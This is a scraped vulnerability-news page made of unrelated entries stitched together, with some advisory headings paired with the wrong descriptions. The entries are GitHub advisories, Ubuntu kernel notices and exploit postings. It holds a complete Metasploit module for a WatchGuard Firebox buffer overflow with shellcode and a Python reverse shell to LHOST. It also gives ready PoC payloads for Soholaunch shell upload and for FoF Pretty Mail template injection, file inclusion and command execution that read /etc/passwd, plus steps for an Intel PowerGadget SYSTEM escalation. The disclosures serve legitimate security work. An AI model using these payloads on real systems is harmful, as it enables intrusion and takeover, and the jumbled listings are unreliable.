Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29686

**Winter CMS Server-Side Template Injection (SSTI) vulnerability**

High severity GitHub Reviewed Published Mar 29, 2024 to the GitHub Advisory Database • Updated Mar 29, 2024

**Package**

composer wintercms/winter (Composer)

**Affected versions**

<= 1.2.3

**Description**

Published to the GitHub Advisory Database

Mar 29, 2024

Last updated

Mar 29, 2024

GHSA-8r5j-gm3j-cx9c: Winter CMS Server-Side Template Injection (SSTI) vulnerability

An issue in aliyundrive-webdav v.2.3.3 and before allows a remote attacker to execute arbitrary code via a crafted payload to the sid parameter in the `action_query_qrcode` component.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29640

**aliyundrive-webdav vulnerable to Command Injection**

High severity GitHub Reviewed Published Mar 29, 2024 to the GitHub Advisory Database • Updated Mar 29, 2024

**Package**

cargo aliyundrive-webdav (Rust)

**Affected versions**

<= 2.3.3

pip aliyundrive-webdav (pip)

**Description**

Published to the GitHub Advisory Database

Mar 29, 2024

Last updated

Mar 29, 2024

GHSA-73v2-rxqp-7q4f: aliyundrive-webdav vulnerable to Command Injection

This Metasploit module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zlib'class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary          called wgagent using pre-authentication endpoint /agent/login.          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Charles Fol (Ambionics Security)', # discovery          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'          'Misterxid' # POC        ],        'References' => [          [ 'CVE', '2022-26318' ],          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Automatic (Reverse Python Interactive Shell)',            {              'Platform' => [ 'unix' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                'SHELL' => '/usr/bin/python'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-08-29',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8080        },        'Notes' => {          'Stability' => [ SERVICE_RESOURCE_LOSS ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])      ]    )  end  def check_watchguard_firebox?    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),      'vars_get' => {        'from_page' => '/'      }    })    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')    false  end  def create_bof_payload    # temporary filename in /tmp where python payload will be stored.    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"    # xml overflow payload    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode    payload << ('A' * 3181).encode    payload << 'MFA>'.encode    payload << ('<BBBBMFA>' * 3680).encode    # padding and rop chain    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"    payload << "\x01\x00\x00\x00\x00\x00\x00"    # shell code to launch an reverse interactive python shell    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed    # The interactive Python shell (-i) is for now the only way to get shell access    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode    payload << "import os; os.remove(\"#{@py_fname}\");".encode    return Zlib.gzip(payload)  end  def check    print_status("Checking if #{peer} can be exploited.")    return CheckCode::Detected if check_watchguard_firebox?    CheckCode::Safe  end  def exploit    print_status("#{peer} - Attempting to exploit...")    bof_payload = create_bof_payload    print_status("#{peer} - Sending payload...")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),      'headers' => {        'Accept-Encoding' => 'gzip, deflate',        'Content-Encoding' => 'gzip'      },      'data' => bof_payload    })  endend

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.

    ## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://livesite.com/### Version : v4.9.4 r441 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file Payload : <?php echo system('id); ?>2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.phpResult: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)

Soholaunch 4.9.4 r44 Shell Upload

Ubuntu Security Notice 6707-4 - Lonial Con discovered that the netfilter subsystem in the Linux kernel did not properly handle element deactivation in certain cases, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Notselwyn discovered that the netfilter subsystem in the Linux kernel did not properly handle verdict parameters in certain cases, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6707-4March 28, 2024linux-azure-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-6.5: Linux kernel for Microsoft Azure cloud systemsDetails:Lonial Con discovered that the netfilter subsystem in the Linux kernel didnot properly handle element deactivation in certain cases, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-1085)Notselwyn discovered that the netfilter subsystem in the Linux kernel didnot properly handle verdict parameters in certain cases, leading to a use-after-free vulnerability. A local attacker could use this to cause a denialof service (system crash) or possibly execute arbitrary code.(CVE-2024-1086)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - Network drivers;   - PWM drivers;(CVE-2024-26597, CVE-2024-26599)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.5.0-1017-azure    6.5.0-1017.17~22.04.1   linux-image-6.5.0-1017-azure-fde  6.5.0-1017.17~22.04.1   linux-image-azure               6.5.0.1017.17~22.04.1   linux-image-azure-fde           6.5.0.1017.17~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6707-4   https://ubuntu.com/security/notices/USN-6707-1   CVE-2024-1085, CVE-2024-1086, CVE-2024-26597, CVE-2024-26599Package Information:   https://launchpad.net/ubuntu/+source/linux-azure-6.5/6.5.0-1017.17~22.04.1

Ubuntu Security Notice USN-6707-4

Ubuntu Security Notice 6704-4 - It was discovered that the NVIDIA Tegra XUSB pad controller driver in the Linux kernel did not properly handle return values in certain error conditions. A local attacker could use this to cause a denial of service. Quentin Minster discovered that the KSMBD implementation in the Linux kernel did not properly handle session setup requests. A remote attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6704-4  
March 28, 2024

linux-intel-iotg, linux-intel-iotg-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms

Details:

It was discovered that the NVIDIA Tegra XUSB pad controller driver in the  
Linux kernel did not properly handle return values in certain error  
conditions. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-23000)

Quentin Minster discovered that the KSMBD implementation in the Linux  
kernel did not properly handle session setup requests. A remote attacker  
could possibly use this to cause a denial of service (memory exhaustion).  
(CVE-2023-32247)

Lonial Con discovered that the netfilter subsystem in the Linux kernel did  
not properly handle element deactivation in certain cases, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2024-1085)

Notselwyn discovered that the netfilter subsystem in the Linux kernel did  
not properly handle verdict parameters in certain cases, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2024-1086)

It was discovered that a race condition existed in the SCSI Emulex  
LightPulse Fibre Channel driver in the Linux kernel when unregistering FCF  
and re-scanning an HBA FCF table, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-24855)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1051-intel-iotg  5.15.0-1051.57  
   linux-image-intel-iotg          5.15.0.1051.51

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1051-intel-iotg  5.15.0-1051.57~20.04.1  
   linux-image-intel               5.15.0.1051.57~20.04.41  
   linux-image-intel-iotg          5.15.0.1051.57~20.04.41

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6704-4  
   https://ubuntu.com/security/notices/USN-6704-1  
   CVE-2023-23000, CVE-2023-32247, CVE-2024-1085, CVE-2024-1086,  
   CVE-2024-24855

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1051.57

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1051.57~20.04.1

Ubuntu Security Notice USN-6704-4

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a local file inclusion vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local FileInclusion (LFI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Local FileInclusion (LFI) due to the unsafe handling of file paths in the emailtemplate. An attacker with administrative access can exploit thisvulnerability to include sensitive files from the server's file system inthe email content, potentially leading to information disclosure.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload at the endof the template:{{ include('/etc/passwd') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the contents of the included file (inthis case, /etc/passwd) in the email content.

FoF Pretty Mail 1.1.2 Local File Inclusion

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a server-side template injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-SideTemplate Injection (SSTI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Server-SideTemplate Injection (SSTI) due to the unsafe handling of template variables.An attacker with administrative access can inject malicious code into theemail template, leading to arbitrary code execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert the following payload:{{ 7*7 }}{{ system('id') }}{{ system('echo "Take The Rose"') }}Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the result of the injected expressions(e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id')}}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.

FoF Pretty Mail 1.1.2 Server-Side Template Injection

The FoF Pretty Mail extension version 1.1.2 for Flarum suffers from a command injection vulnerability.

    Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command InjectionDate: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion: 1.1.2Tested on: Windows XPCVE: N/ADescription:The FoF Pretty Mail extension for Flarum is vulnerable to Command Injectiondue to the unsafe handling of user input in the email template. An attackerwith administrative access can inject PHP code into the email template,leading to arbitrary command execution on the server.Steps to Reproduce:Log in as an administrator on the Flarum forum.Navigate to the FoF Pretty Mail extension settings.Edit the email default template and insert one of the following payloads atthe end of the template:<?php system('echo "Take The Rose"; id'); ?>or<?php system('echo "Take The Rose"; cat /etc/passwd'); ?>Save the changes to the email template.Trigger any action that sends an email, such as user registration orpassword reset.The recipient of the email will see the message "Take The Rose" followed bythe output of the injected command (id or cat /etc/passwd) in the emailcontent.

FoF Pretty Mail 1.1.2 Command Injection

Intel PowerGadget version 3.6 suffers from a local privilege escalation vulnerability.

    Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair modeAffected Products: Intel PowerGadgetAffected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on ‎Monday, ‎February ‎1, ‎2021 9:43:20 PM (this seems to be the latest version), earlier versions might be affected as well.Affected Platforms: WindowsCommon Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGHRisk score (CVSSv3): 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update nor a security advisory. Intel said that they are OK with me making this finding public, under the condition that I would emphasize that the product is EOL.Description and steps to replicate:On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in the "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (meaning it prevents the sc.exe process from exiting). That process is running as NT AUTHORITY/SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be called by right-clicking on the console window bar and entering "properties". Once a web browser is spawn, attacker can call up the "Open" dialog and in that way get a fully working escape to explorer. From there they can, for example, browse through C:\Windows\System32 and right-click on cmd.exe and run it, obtaining as SYSTEM shell.Now - an important detail - on most recent builds of Windows neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus for successful exploitation another browser has to already be present in the system. As you can see I pick Chrome and then spawn an instance of cmd.exe, which turns out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog, as if you pick the wrong one (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM and from then further attacks like this won't work if you want to repeat the POC - unless you reverse that change somewhere in the registry.This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.To run the installer in repair mode, one needs to identify the proper MSI file. After normal installation, it is by default present in C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like control sum, size or "author" information.The exploitation process is illustrated in the screenshots below, reflecting the the steps taken to attain a SYSTEM shell (no exploit development is required, the issue can be exploited using GUI).Recommendation:Technically, as per the reference, it is recommended to change the way the sc.exe is called, using the WixQuietExec() method (see the second reference). In such case the conhost.exe window will not be visible to the user, thus making it impossible to perform any GUI interaction and an escape.I am, however, aware that this product is no longer maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html) and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware why they need to replace PowerGadget with Intel Performance Counter Monitor.Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).References:https://hackingiscool.pl/intel-powergadget-3-6-local-privilege-escalation/https://www.mandiant.com/resources/blog/privileges-third-party-windows-installershttps://wixtoolset.org/docs/v3/customactions/qtexec/https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html)https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi

Tag

#vulnerability